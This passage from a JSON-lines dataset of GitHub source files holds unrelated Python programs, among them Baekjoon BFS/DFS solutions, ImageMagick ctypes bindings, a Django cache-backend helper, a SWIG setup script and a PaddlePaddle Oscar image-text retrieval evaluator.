button.grid(row=8, columnspan=8)\n\n new_window.mainloop()\n\n\ndef prelaunch():\n name = text_input.get()\n dbs = dbSubsystem()\n if dbs.retrieveGame(name):\n launch(root, name)\n else:\n root.destroy() \n launchwithconf(name) \n\ndef launch(w, name, board=False):\n w.destroy()\n print('launch called')\n gb = gameBoard(name, board)\n gb.save()\n masterDSub = DisplaySubsystem(512,512,\"inferno\",'inferno', gb)\n masterDSub.run()\n\n\n\nroot = tk.Tk()\nroot.title(\"inferno_prelaunchassistant\")\n\nlabel = tk.Label(root, text=\"Create/Retrieve board\")\nlabel.pack()\n\nlabel = tk.Label(root, text=\"Board name? 
\")\nlabel.pack()\n\ntext_input = tk.Entry(root)\ntext_input.pack()\n\nbutton = tk.Button(root, text=\"LAUNCH\", command=prelaunch)\nbutton.pack()\n\nroot.mainloop()","repo_name":"SumukhPrasad/CS-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13466283321","text":"## 미로 탐색\n\nimport sys\n\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\n\nmatrix = [input().rstrip() for _ in range(n)]\nvisit = [[0] * m for _ in range(n)]\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\nqueue = [[0, 0]]\nvisit[0][0] = 1\n\nwhile queue:\n x, y = queue.pop(0)\n\n if x == n - 1 and y == m - 1:\n print(visit[x][y])\n break\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m:\n if visit[nx][ny] == 0 and matrix[nx][ny] == \"1\":\n visit[nx][ny] = visit[x][y] + 1\n queue.append([nx, ny])","repo_name":"yejiiha/BaekJoon_step","sub_path":"DFS and BFS/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19517744985","text":"\n__all__ = [\n 'SegmentInfo',\n 'AffineMatrix',\n 'GradientInfo',\n ]\n\nimport ctypes\nfrom magickpy.image import Image\nfrom magickpy.types import RectangleInfo, PixelPacket\nfrom magickpy.enums import CompositeOp\nfrom magickpy.util import wrap_ptr_class\nfrom magickpy import lib\n\nclass SegmentInfo(ctypes.Structure):\n _fields_ = [\n ('x1', ctypes.c_double),\n ('y1', ctypes.c_double),\n ('x2', ctypes.c_double),\n ('y2', ctypes.c_double),\n ]\n\nclass AffineMatrix(ctypes.Structure):\n _fields_ = [\n ('sx', ctypes.c_double),\n ('rx', ctypes.c_double),\n ('ry', ctypes.c_double),\n ('sy', ctypes.c_double),\n ('tx', ctypes.c_double),\n ('ty', ctypes.c_double),\n ]\n\nclass GradientInfo(ctypes.Structure):\n _fields_ = [\n ('type', ctypes.c_int),\n ('bounding_box', RectangleInfo),\n ('gradient_vector', SegmentInfo),\n ('stops', ctypes.c_void_p),\n ('number_stops', ctypes.c_ulong),\n ('spread', ctypes.c_int),\n ('debug', ctypes.c_int),\n ('signature', ctypes.c_ulong),\n ]\n def __new__(self):\n raise NotImplementedError\n\nclass ElementReference(ctypes.Structure):\n def __new__(self):\n raise NotImplementedError\nElementReference._fields_ = [\n ('id', ctypes.c_char_p),\n ('type', ctypes.c_int),\n ('gradient', GradientInfo),\n ('signature', ctypes.c_ulong),\n ('previous', ctypes.POINTER(ElementReference)),\n ('next', ctypes.POINTER(ElementReference)),\n ]\n\nclass _DrawInfo(ctypes.Structure):\n _fields_ = [\n ('primitive', ctypes.c_char_p),\n ('geometry', ctypes.c_char_p),\n ('viewbox', RectangleInfo),\n ('affine', AffineMatrix),\n ('gravity', ctypes.c_int),\n ('fill', PixelPacket),\n ('stroke', PixelPacket),\n ('stroke_width', ctypes.c_double),\n ('gradient', GradientInfo),\n ('fill_pattern', Image),\n ('tile', Image),\n ('stroke_pattern', Image),\n ('stroke_antialias', ctypes.c_int),\n ('text_antialias', ctypes.c_int),\n ('fill_fule', ctypes.c_int),\n ('linecap', ctypes.c_int),\n ('linejoin', ctypes.c_int),\n ('miterlimit', ctypes.c_ulong),\n ('dash_offset', ctypes.c_double),\n ('decorate', ctypes.c_int),\n ('compose', ctypes.c_int),\n ('text', ctypes.c_char_p),\n ('face', ctypes.c_ulong),\n ('font', ctypes.c_char_p),\n ('metrics', ctypes.c_char_p),\n ('family', ctypes.c_char_p),\n ('style', ctypes.c_int),\n ('stretch', ctypes.c_int),\n ('weight', ctypes.c_ulong),\n 
('encoding', ctypes.c_char_p),\n ('pointsize', ctypes.c_double),\n ('density', ctypes.c_char_p),\n ('align', ctypes.c_int),\n ('undercolor', PixelPacket),\n ('border_color', PixelPacket),\n ('server_name', ctypes.c_char_p),\n ('dash_pattern', ctypes.c_double),\n ('clip_mask', ctypes.c_char_p),\n ('bounds', SegmentInfo),\n ('clip_units', ctypes.c_int),\n ('opacity', ctypes.c_short),\n ('render', ctypes.c_int),\n ('element_reference', ElementReference),\n ('debug', ctypes.c_int),\n ('signature', ctypes.c_ulong),\n ]\n\nDrawInfo = wrap_ptr_class(_DrawInfo, lib.AcquireDrawInfo, lib.DestroyDrawInfo)\n","repo_name":"tailhook/magickpy","sub_path":"magickpy/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"38375758552","text":"import sys\nsys.setrecursionlimit(10**6)\n\n### DFS implementation\ndef solution(grid):\n def dfs(i,j):\n if i<0 or j<0 or i>=n or j>=m or grid[i][j] != 1:\n return\n grid[i][j] = 0\n dfs(i, j+1)\n dfs(i, j-1)\n dfs(i+1, j)\n dfs(i-1, j)\n\n count = 0\n for i in range(n):\n for j in range(m):\n if grid[i][j] == 1:\n dfs(i, j)\n count += 1\n return count\n\n# start of the solution\nt = int(input())\n\n# build the 2D cabbage-field grid\nfor _ in range(t):\n m, n, k = map(int, sys.stdin.readline().split())\n grid = [[0 for col in range(m)] for row in range(n)]\n for _ in range(k):\n y, x = map(int,sys.stdin.readline().split())\n grid[x][y] = 1\n\n print(solution(grid))","repo_name":"bong7233/BOJ","sub_path":"백준/Silver/1012. 유기농 배추/유기농 배추.py","file_name":"유기농 배추.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16796180522","text":"\"\"\"Compatibility functions for older Django cache backend configuration.\n\nThese functions are used to maintain compatibility or transition settings from\nolder versions of Django.\n\"\"\"\n\nimport logging\n\nfrom django.core.cache import DEFAULT_CACHE_ALIAS, InvalidCacheBackendError\n\ntry:\n from django.core.cache import parse_backend_uri\nexcept ImportError:\n from djblets.util.compat.django.core.cache import parse_backend_uri\n\n\nlogger = logging.getLogger(__name__)\n\n\nBACKEND_CLASSES = {\n 'db': 'db.DatabaseCache',\n 'dummy': 'dummy.DummyCache',\n 'file': 'filebased.FileBasedCache',\n 'locmem': 'locmem.LocMemCache',\n 'memcached': 'memcached.PyMemcacheCache',\n}\n\nRENAMED_BACKENDS = {\n 'django.core.cache.backends.memcached.CacheClass':\n 'django.core.cache.backends.memcached.PyMemcacheCache',\n 'django.core.cache.backends.memcached.MemcachedCache':\n 'django.core.cache.backends.memcached.PyMemcacheCache',\n}\n\n\ndef normalize_cache_backend(cache_backend, cache_name=DEFAULT_CACHE_ALIAS):\n \"\"\"Return a new-style ``CACHES`` dictionary from any given cache_backend.\n\n Over time, Django has had support for two formats for a cache backend: the\n old-style :django:setting:`CACHE_BACKEND` string, and the new-style\n :django:setting:`CACHES` dictionary.\n\n This function will accept either as input and return a dictionary\n containing a single normalized entry for the given cache backend. 
This can\n be merged into the existing :django:setting:`CACHES` setting.\n\n If a :django:setting:`CACHES` dictionary is passed, the \"default\" cache\n will be the result.\n\n Args:\n cache_backend (dict or str):\n The new-style or old-style cache backend dictionary or str to\n normalize.\n\n cache_name (str):\n The name of the cache backend to look up in ``cache_backend``, if\n a new-style dictionary is provided.\n\n Returns:\n A new-style cache backend dictionary containing the single cache\n backend referenced. If there were any parsing issues, an empty\n dictionary will be returned.\n \"\"\"\n if not cache_backend:\n return {}\n\n if isinstance(cache_backend, dict):\n backend_info = cache_backend.get(cache_name, {})\n backend_name = backend_info.get('BACKEND')\n\n if backend_name in RENAMED_BACKENDS:\n backend_info['BACKEND'] = RENAMED_BACKENDS[backend_name]\n\n return backend_info\n\n try:\n engine, host, params = parse_backend_uri(cache_backend)\n except InvalidCacheBackendError as e:\n logger.error('Invalid cache backend (%s) found while loading '\n 'siteconfig: %s',\n cache_backend, e)\n return {}\n\n if engine in BACKEND_CLASSES:\n engine = 'django.core.cache.backends.%s' % BACKEND_CLASSES[engine]\n else:\n engine = '%s.CacheClass' % engine\n\n defaults = {\n 'BACKEND': engine,\n 'LOCATION': host,\n }\n defaults.update(params)\n\n return defaults\n","repo_name":"djblets/djblets","sub_path":"djblets/cache/backend_compat.py","file_name":"backend_compat.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"34"} +{"seq_id":"42068383418","text":"import os\nimport os.path\nfrom ..const import CONTEXT_FILE_NAME\nfrom ..config import Config\n\n\ndef new_context(\n config: Config,\n name: str,\n image: str,\n base: str,\n):\n path = os.getcwd()\n\n # create directory\n current_dir = os.path.basename(path)\n if current_dir != name and name is not None:\n path = os.path.join(path, name.lower())\n os.mkdir(path)\n print('Created context folder', path)\n\n context = {}\n\n # image name\n if image is not None:\n print('Image:', image)\n context['image'] = image\n\n # base image name\n if base is not None:\n print('Base image:', base)\n context['base'] = base\n \n context = Config(data={\n \"version\": 1,\n \"cowait\": context\n }, parent=config)\n\n context_file = os.path.join(path, CONTEXT_FILE_NAME)\n if os.path.isfile(context_file):\n print('Error: Context file', context_file, 'already exists')\n return\n\n context.write(context_file)\n print('Created new context definition', context_file)\n","repo_name":"backtick-se/cowait","sub_path":"cowait/cli/commands/new_context.py","file_name":"new_context.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"34"} +{"seq_id":"14107622358","text":"import random\nimport my_module\n\nprint(my_module.pi)\n\nrandom_int = random.randint(1, 10)\nprint(random_int)\n\n# 0.00 - 0.9999\nrandom_float = random.random()\nprint(random_float)\n\n# for a number between 0 and 5\nrandom_float * 5 # 0.00 - 4.99999\n\nlove_score = random.randint(1, 100)\nprint(f\"your love score is {love_score}\")\n\n# import modules\n# learn random module functions for integers and 
floats","repo_name":"timcrisp94/100-days-of-python","sub_path":"1-20/day_4/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"69873956257","text":"import random\n\n# Choice names\nr = \"Rock\"\np = \"Paper\"\nsc = \"Scissors\"\nsp = \"Spock\"\nl = \"Lizard\"\n\n# Who beats whom\nbeat_table = {\n r : [ l, sc ],\n p : [ sp, r ],\n sc : [ p, l ],\n sp : [ r, sc ],\n l : [ p, sp ] \n}\n\n# How do they beat each other?\nbeat_name = {\n sc+p : \"Scissors cut Paper!\",\n p+r : \"Paper covers Rock!\",\n r+l : \"Rock crushes Lizard!\",\n l+sp : \"Lizard poisons Spock!\",\n sp+sc: \"Spock smashes Scissors!\",\n sc+l : \"Scissors decapitates Lizard!\",\n l+p : \"Lizard etas Paper!\",\n p+sp : \"Paper disproves Spock!\",\n sp+r : \"Spock vaporizes Rock!\",\n r+sc : \"Rock crushes Scissors!\"\n}\n\nfull_names = [ r, p, sc, sp, l ]\nshort_names = [ \"R\", \"P\", \"Sc\", \"Sp\", \"L\" ]\n\nshort_to_full = {\n \"R\" : r,\n \"P\" : p,\n \"Sc\": sc,\n \"Sp\": sp,\n \"L\": l\n}\n\nwhile True:\n print(\"Choose your hero!\")\n print(\"(R)ock, (P)aper, (Sc)issors, (Sp)ock, (L)izard\")\n\n player_choice = input()\n\n if player_choice not in full_names:\n if player_choice in short_names:\n player_choice = short_to_full[player_choice]\n else:\n print(\"Oh no! Seems like you misspelled something. Try again!\")\n continue\n\n computer_choice = random.choice(full_names)\n\n print(\"Computer randomly chose {}!\".format(computer_choice))\n\n if computer_choice in beat_table[player_choice]:\n print(beat_name[player_choice+computer_choice])\n print(\"You won! Let's play more? (Y)es/(N)o\")\n elif player_choice in beat_table[computer_choice]:\n print(beat_name[computer_choice+player_choice])\n print(\"You lost! Wanna take a revenge? (Y)es/(N)o\")\n else:\n print(\"Seems like it's a draw. Want to try once again? (Y)es/(N)o\")\n\n go_on = input()\n\n if(go_on == \"Y\" or go_on == \"Yes\"):\n print(\"That's noice! Let's play!\")\n elif(go_on == \"N\" or go_on == \"No\"):\n print(\"That's a shame you don't want to play... 
Cause I do!\")\n exit()\n else:\n print(\"I didn't quite get what you've said, but I guess you want to play more!\")","repo_name":"deniskamazur/techrace","sub_path":"RPSSL/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"15708102459","text":"import os\nimport glob\nimport ntpath\nimport shutil\nimport sqlite3\nimport paramiko\nfrom robot.api import logger\nfrom _WebServiceCore import _WebServiceCore\n\n\nclass _Database_Keywords(_WebServiceCore):\n _target_db = None\n _db_path = None\n\n def _set_db_path(self, db):\n # logger.info(db)\n assert os.path.exists('./artifacts/{0}'.format(db)), AssertionError('Unable to find database')\n self._db_path = './artifacts/{0}'.format(db)\n\n def _extract_db_files(self, ip_address='', offline=False):\n\n if not offline:\n # Extract default DB from the ECU\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n try:\n ssh.connect(hostname=ip_address,\n port=9003,\n username='root')\n sftp = ssh.open_sftp()\n\n if not os.path.exists('./artifacts'):\n os.makedirs('./artifacts')\n\n stdin, stdout, stderr = ssh.exec_command('find /firmware/webservice/data -name *.sqlite')\n filelist = stdout.read().splitlines()\n\n for _file in filelist:\n sftp.get(_file, './artifacts/{0}'.format(ntpath.basename(_file)))\n\n sftp.close()\n ssh.close()\n\n logger.info('Databases successfully retrieved')\n\n except paramiko.SSHException:\n logger.info('Unable to retrieve databases')\n\n else:\n files = [y for x in os.walk(str(offline)) for y in glob.glob(os.path.join(x[0], '*.sqlite'))]\n for i in files:\n shutil.copyfile(i, './artifacts/{0}'.format(os.path.basename(i)))\n\n def _get_all_table_records(self, table, identifier='*'):\n _cmd = 'select {0} from {1} {2}'.format(identifier, table, 'desc' if identifier != '*' else '')\n\n if self._db_path:\n self._target_db = sqlite3.connect(self._db_path)\n\n cur = self._target_db.cursor()\n cur.execute(_cmd)\n to_return = cur.fetchall()\n self._target_db.close()\n\n return to_return\n else:\n return list()\n","repo_name":"qijia00/RobotFramework_AcceptanceTestDrivenDevelopment_Python","sub_path":"src/WebServiceLibrary/keywords/_database_keywords.py","file_name":"_database_keywords.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28855100858","text":"import cv2\nimport numpy as np\nimport time\n\n\ndef callback(object):\n pass\n\n\ncv2.namedWindow('mask_yellow', cv2.WINDOW_AUTOSIZE)\ncv2.namedWindow('mask_green', cv2.WINDOW_AUTOSIZE)\ncv2.namedWindow('mask_red', cv2.WINDOW_AUTOSIZE)\ncv2.createTrackbar('red1_H', 'mask_red',0,10,callback)#red1\ncv2.createTrackbar('red2_H', 'mask_red',156,180,callback)#red1\ncv2.createTrackbar('red_S','mask_red',43,255,callback)\ncv2.createTrackbar('red_V','mask_red',200,255,callback)\n\ncv2.createTrackbar('green_H', 'mask_green',35,77,callback)#red1\ncv2.createTrackbar('green_S', 'mask_green',43,255,callback)\ncv2.createTrackbar('green_V', 'mask_green',200,255,callback)\n\ncv2.createTrackbar('yellow_H', 'mask_yellow',11,43,callback)#red1\ncv2.createTrackbar('yellow_S', 'mask_yellow',43,255,callback)\ncv2.createTrackbar('yellow_V', 'mask_yellow',200,255,callback)\n\ncapture = cv2.VideoCapture(1)\ncapture.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncapture.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\ngreen_low = np.array([40, 103, 
164])\ngreen_up = np.array([77, 255, 255])\n\nred0_low = np.array([5, 166, 224])\nred1_low = np.array([160, 166,224])\n\nred0_up = np.array([10, 255, 255])\nred1_up = np.array([180, 255, 255])\n\nlower_yellow = np.array([15, 130, 190]) # 黄色低阈值\nupper_yellow = np.array([34, 255, 255]) # 黄色高阈值\n\ndef color_rec(dst):\n color=0\n hsv = cv2.cvtColor(dst, cv2.COLOR_BGR2HSV)\n\n mask_green = cv2.inRange(hsv, green_low, green_up)\n mask_yellow = cv2.inRange(hsv, lower_yellow, upper_yellow)\n red_mask1 = cv2.inRange(hsv, red0_low, red0_up)\n red_mask2 = cv2.inRange(hsv, red1_low, red1_up)\n mask_red = cv2.bitwise_or(red_mask1, red_mask2)\n\n contours, hierarchy = cv2.findContours(mask_green, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contours1, hierarchy2 = cv2.findContours(mask_red, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n contours2, hierarchy3 = cv2.findContours(mask_yellow, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n if len(contours):\n (x, y, w, h) = cv2.boundingRect(contours[0])\n\n else:\n w=0\n h=0\n\n if len(contours1):\n (x1, y1, w1, h1) = cv2.boundingRect(contours1[0])\n else:\n w1=0\n h1=0\n\n if len(contours2):\n (x2, y2, w2, h2) = cv2.boundingRect(contours2[0])\n else:\n w2=0\n h2=0\n\n s1=w*h\n s2=w1*h1\n s3=w2*h2\n if s1>=30:\n print(\"green\")\n color=1 #green\n elif s2>=30:\n print('red')\n color=2 #red\n elif s3>=30:\n print('yellow')\n color=3 #yelow\n cv2.imshow(\"mask_red\", mask_red)\n cv2.imshow(\"mask_yellow\", mask_yellow)\n cv2.imshow(\"mask_green\", mask_green)\n return color\n\nwhile True:\n ret, frame = capture.read()\n t1=time.time()\n H1 = cv2.getTrackbarPos('red1_H', 'mask_red')\n H2 = cv2.getTrackbarPos('red2_H', 'mask_red')\n S = cv2.getTrackbarPos('red_S', 'mask_red')\n V = cv2.getTrackbarPos('red_V', 'mask_red')\n g_H = cv2.getTrackbarPos('green_H', 'mask_green')\n g_S = cv2.getTrackbarPos('green_S', 'mask_green')\n g_V = cv2.getTrackbarPos('green_V', 'mask_green')\n y_H = cv2.getTrackbarPos('yellow_H', 'mask_yellow')\n y_S = cv2.getTrackbarPos('yellow_S', 'mask_yellow')\n y_V = cv2.getTrackbarPos('yellow_V', 'mask_yellow')\n #red0_low=np.array([H1,S,V])\n #red1_low=np.array([H2,S,V])\n #green_low=np.array([g_H,g_S,g_V])\n #lower_yellow=np.array([y_H,y_S,y_V])\n color_rec(frame)\n t2 = time.time() - t1\n #print(t2)\n if cv2.waitKey(10) == 27:\n break\ncv2.destroyAllWindows()","repo_name":"mengxiwenmxw/smallcar-15","sub_path":"颜色阈值调节.py","file_name":"颜色阈值调节.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71903236578","text":"import matplotlib.pyplot as plt\r\nimport csv\r\nfrom sklearn.cluster import KMeans\r\nimport time\r\n\r\nstart_time = time.time()\r\n\r\ntravel_rate = 20000/60\r\ntime_start = 0\r\ntime_end = 60*24*7\r\nmax_delivery_time = 60*4\r\n\r\n# import data from .csv file\r\ncsv_file = 'finalProject.csv'\r\nf = open(csv_file, 'r')\r\nreader = csv.reader(f)\r\nnext(reader)\r\ndata = [[float(i[j]) for j in range(len(i))] for i in reader]\r\n\r\n'''\r\n# compute a position by weight\r\n\r\nx_sum = 0 \r\ny_sum = 0\r\n\r\nfor obj in data:\r\n\tx_sum += (obj[1] + obj[3])\r\n\ty_sum += (obj[2] + obj[4])\r\nx_avg = x_sum / len(data)\r\ny_avg = y_sum / len(data)\r\np_avg = data[200][1:3]\r\n\r\n# print value\r\nprint(x_avg, y_avg)\r\n'''\r\n# compute the value\r\ndef dist(p1, p2):\r\n\treturn abs(p1[0] - p2[0]) + abs(p1[1] - p2[1])\r\n\r\ndef val(d1, d2):\r\n\treturn 1.2 ** (-1 * (1 + 0.001*(d1 + 0.5 * d2)))\r\n#\r\n'''\r\nt_time = []\r\nfor obj in 
data:\r\n\tt_time.append(dist(obj[1:3], obj[3:5]) / travel_rate)\r\n\r\n\r\nprint(sum(t_time) / len(t_time))\r\n\r\nplt.hist(t_time)\r\nplt.show()\r\n'''\r\n'''\r\nv = 0\r\nfor obj in data:\r\n\tprint(obj[1:3])\r\n\tv += val( dist(p_avg, obj[1:3]), dist(p_avg, obj[3:5]) )\r\nprint(v)\r\n\r\n'''\r\n'''\r\n# sort\r\nt = sorted(data, key=lambda item : item[0])\r\nwith open('ProjectSorted.csv', 'w', newline='') as fp:\r\n a = csv.writer(fp)\r\n a.writerows(t)\r\n\r\nfor obj in data:\r\n\tplt.plot(obj[1], obj[2], 'ro')\r\nplt.show()\r\n\r\n\r\n#\r\n'''\r\n\r\n\r\n#\r\nx = [i for i in range(2000)]\r\ny = [1.2 ** ( -1 * (1 + 0.01 * i)) for i in x]\r\nplt.plot(x, y)\r\nplt.show()","repo_name":"jshen28/IE511_Project","sub_path":"try1.py","file_name":"try1.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16877813946","text":"# https://www.techiedelight.com/coin-change-problem-find-total-number-ways-get-denomination-coins/\nimport sys\nimport numpy as np\n\n\ndef get_user_input():\n user_input_list = input(\"Please enter a list of integers separated by a comma. No spaces.\\n\").split(\", \")\n user_int_list = []\n\n for element in user_input_list:\n if element.isdigit():\n int_element = int(element)\n user_int_list.append(int_element)\n else:\n print(\"Sorry, one or many values that you entered are not integers. Please try again\")\n sys.exit()\n\n user_int_list.sort()\n return user_int_list\n\n\ndef generate_max_fits_list(target, lst):\n max_fits_list = []\n for index1 in range(0, len(lst)):\n temp_fit_lst = []\n max_fit = int(target/lst[index1])\n for index2 in range(0, max_fit + 1):\n temp_fit_lst.append(index2)\n max_fits_list.append(temp_fit_lst)\n return max_fits_list\n\n\ndef max_fit_combinations(arrays, out=None):\n # https://stackoverflows.co/questions/1208118/using-numpy-to-build-an-array-of-all-combinations-of-two-arrays\n arrays = [np.asarray(x) for x in arrays]\n dtype = arrays[0].dtype\n\n n = np.prod([x.size for x in arrays])\n if out is None:\n out = np.zeros([n, len(arrays)], dtype=dtype)\n\n # m = n / arrays[0].size\n m = int(n / arrays[0].size)\n out[:, 0] = np.repeat(arrays[0], m)\n if arrays[1:]:\n max_fit_combinations(arrays[1:], out=out[0:m, 1:])\n for j in range(1, arrays[0].size):\n # for j in xrange(1, arrays[0].size):\n out[j * m:(j + 1) * m, 1:] = out[0:m, 1:]\n # for i in range(0, len(out[j * m:(j + 1) * m])):\n # print(f\"this is out[long] {out[j * m:(j + 1) * m][i]}\")\n return out\n\n\ndef find_all_fit_ways(target, user_lst, fit_lst):\n target_fit_arr = np.array([], dtype='int32')\n arr = np.array(user_lst)\n arr.reshape((len(arr), 1))\n fit_arr = np.array(fit_lst)\n\n for i in range(0, len(fit_arr)):\n temp_sum = int(np.matmul(fit_arr[i], arr))\n if temp_sum == target:\n target_fit_arr = np.append(target_fit_arr, fit_arr[i])\n\n rows = int(len(target_fit_arr)/len(user_lst))\n cols = len(user_lst)\n target_fit_arr = target_fit_arr.reshape((rows, cols))\n return target_fit_arr\n\n\ndef find_coin_ways(fit_arr, user_lst):\n final_coin_lst = []\n fit_lst = fit_arr.tolist()\n for index in range(0, len(fit_lst)):\n temp_lst = []\n for count in range(0, len(user_lst)):\n if len(temp_lst) == 0:\n temp_lst = [user_lst[count]] * fit_lst[index][count]\n else:\n temp_lst = temp_lst + [user_lst[count]] * fit_lst[index][count]\n final_coin_lst.append(temp_lst)\n\n return final_coin_lst\n\n\nuser_target = int(input(\"Please insert a target sum.\\n\"))\nuser_input_lst = 
get_user_input()\nmax_fits = generate_max_fits_list(user_target, user_input_lst)\nall_max_fit_combinations = max_fit_combinations(max_fits)\nfit_array = find_all_fit_ways(user_target, user_input_lst, all_max_fit_combinations)\nresult = find_coin_ways(fit_array, user_input_lst)\nprint(f\"The total number of ways is {len(result)}.\\n{result}\")\n","repo_name":"SabrinaDu7/daily-exercises","sub_path":"day2.3.2.py","file_name":"day2.3.2.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26181351021","text":"#!/usr/bin/env python\n\nimport os, sys \n\nfrom setuptools import find_packages \nfrom platform import python_version\n_packages = find_packages() \n\nimport numpy \nfrom os.path import join, dirname\n# from setuptools import setup\n\nfrom distutils.core import setup \nfrom setuptools.extension import Extension \n\nver = sys.version_info\n\n\ninclude_dirs=[ '/usr/include/databox', numpy.get_include()]\n \n# if ver.major == 3 :\n# if ver.minor == 7: \n# include_dirs.append( \"/usr/include/python3.7m\" ) \n# elif ver.minor == 6:\n# include_dirs.append( \"/usr/include/python3.6m\" ) \n\next_modules = [\n Extension(\n '_gjsonc',\n sources=[ \n \"./gjsonc_wrap.cxx\"\n ],\n libraries=[ ],\n# extra_link_args=[ 'libcrypto.a', 'libssl.a' ], \n extra_compile_args=[\n \"-std=c++11\",\n \"-fPIC\", '-g0', '-O3', \n \"-D__RELEASE__\", \n# \"-DSWIGRUNTIME_DEBUG\",\n \"-D__NOLOGGER__\" ], # '-Wall', \"-fPIC\", \"-std=c++11\", '-g0', '-O3', '-Wno-cpp', \n \n include_dirs= include_dirs\n ) \n] \n\nsetup (name='gjsonc',\n version='1.0',\n author=\"SWIG Docs\",\n description=\"\"\"Simple gjsonc from docs\"\"\",\n ext_modules=ext_modules,\n py_modules=[\"gjsonc\"],\n packages=_packages \n)\n","repo_name":"pkuazi/AISample","sub_path":"utils/geojsons/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42014914291","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nsys.path.insert(0, '.')\nimport argparse\nfrom tqdm import tqdm\n\n# paddle\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nfrom paddle.io import DataLoader\nfrom paddlenlp.transformers.bert.tokenizer import BertTokenizer\n\n# model\nfrom models.bert import BertConfig\nfrom models.oscar import OscarForVLTaks\n# dataset\nfrom datasets.retrieval_dataset import RetrievalDataset\n# config\nfrom config.default import get_cfg_defaults\n# utils\nfrom utils.utils import compute_ranks\n\n\ndef main(args, cfg):\n # 1. Create test dataloader\n tokenizer = BertTokenizer.from_pretrained(cfg['INPUT']['BERT_MODEL'])\n test_dataset = RetrievalDataset(split=cfg['DATASET']['TEST'],\n cfg=cfg,\n tokenizer=tokenizer,\n training=False)\n test_dataloader = DataLoader(dataset=test_dataset,\n shuffle=False,\n batch_size=cfg['OPTIMIZATION']['BATCH_SIZE'],\n num_workers=cfg['MISC']['NUM_WORKERS'],\n drop_last=False)\n\n # 2. 
Build model\n config = BertConfig.from_json_file(os.path.join(args.checkpoint_dir, 'config.json'))\n config.num_labels = cfg['OUTPUT']['NUM_LABELS']\n config.loss_type = cfg['OPTIMIZATION']['LOSS_TYPE']\n config.img_feat_dim = cfg['INPUT']['IMG_FEATURE_DIM']\n config.img_feat_type = cfg['INPUT']['IMG_FEATURE_TYPE']\n model = OscarForVLTaks(config=config)\n checkpoint = paddle.load(os.path.join(args.checkpoint_dir, 'paddle_model.bin'))\n model.set_state_dict(checkpoint['model'])\n print('Load state dict from %s.' % args.checkpoint_dir)\n model.eval()\n\n # 3. Start to inference\n inference_file = os.path.join(args.checkpoint_dir, 'inference_results.pd')\n if os.path.isfile(inference_file):\n print('Found inference file in {}, skip inference.'.format(inference_file))\n results = paddle.load(inference_file)\n else:\n print('Found no inference file in {}, start to inference'.format(args.checkpoint_dir))\n results = {}\n for inds, batch in tqdm(test_dataloader):\n with paddle.no_grad():\n inputs = {\n 'input_ids': batch[0],\n 'attention_mask': batch[1],\n 'token_type_ids': batch[2],\n 'img_feats': batch[3],\n 'labels': batch[4],\n }\n _, logits = model(**inputs)[:2]\n probs = F.softmax(logits, axis=1)\n # The confidence to be a matched pair\n result = probs[:, 1]\n inds = [inds[i].item() for i in range(inds.shape[0])]\n result = [result[i].item() for i in range(result.shape[0])]\n results.update({ind: res for ind, res in zip(inds, result)})\n print('Inference Done! Saving inference results to {}.'.format(inference_file))\n paddle.save(results, inference_file)\n\n # 4. Start to evaluate\n i2t_ranks, t2i_ranks = compute_ranks(test_dataset, results)\n rank = [1, 5, 10]\n i2t_accs = [sum([_ < r for _ in i2t_ranks]) / len(i2t_ranks) for r in rank]\n print(\"I2T Retrieval: {:.4f} @ R1, {:.4f} @ R5, {:.4f} @ R10\".format(\n i2t_accs[0], i2t_accs[1], i2t_accs[2]))\n t2i_accs = [sum([_ < r for _ in t2i_ranks]) / len(t2i_ranks) for r in rank]\n print(\"T2I Retrieval: {:.4f} @ R1, {:.4f} @ R5, {:.4f} @ R10\".format(\n t2i_accs[0], t2i_accs[1], t2i_accs[2]))\n\n\nif __name__ == '__main__':\n parser = 